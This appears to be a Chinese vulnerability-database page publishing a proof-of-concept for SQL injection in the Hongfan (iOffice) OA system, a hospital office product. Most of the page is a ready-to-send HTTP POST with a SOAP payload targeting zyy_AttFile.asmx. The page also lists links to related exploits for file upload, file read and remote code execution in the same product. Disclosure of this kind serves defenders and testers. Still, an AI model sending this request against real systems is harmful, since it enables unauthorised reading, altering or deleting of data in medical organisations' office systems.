红帆oa zyy_attfile.asmx sql注入

日期: 2023-07-12 | 影响软件: 红帆OA | POC: 已公开

漏洞描述

红帆科技深耕医疗行业21年,专注医疗行政办公管理,经过了多年的经验积累,oa办公系统、bpm,移动oa,流程管理等系统在实际应用中得到了良好的印证。红帆OA系统存在sql注入漏洞：获取数据、修改数据、删除数据等

PoC代码

POST /iOffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
Host: 
Content-Type: text/xml
Content-Length: 388

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <GetFileAtt
            xmlns="http://tempuri.org/">
            <fileName>%</fileName>
        </GetFileAtt>
    </soap:Body>
</soap:Envelope>

漏洞描述

PoC代码

相关漏洞推荐

hongfan-oa-iorepsavexml-file-upload: 红帆OA iorepsavexml.aspx 任意文件上传 POC

ioffice-oa-iofileexport-read-file: 红帆OA ioFileExport.aspx 任意文件读取漏洞 POC

ioffice-oa-udfmr-asmx-sql-inject: 红帆OA udfmr.asmx SQL注入漏洞 POC

hongfan-oa-ioassistance-rce: 红帆OA ioAssistance.asmx 注入RCE POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC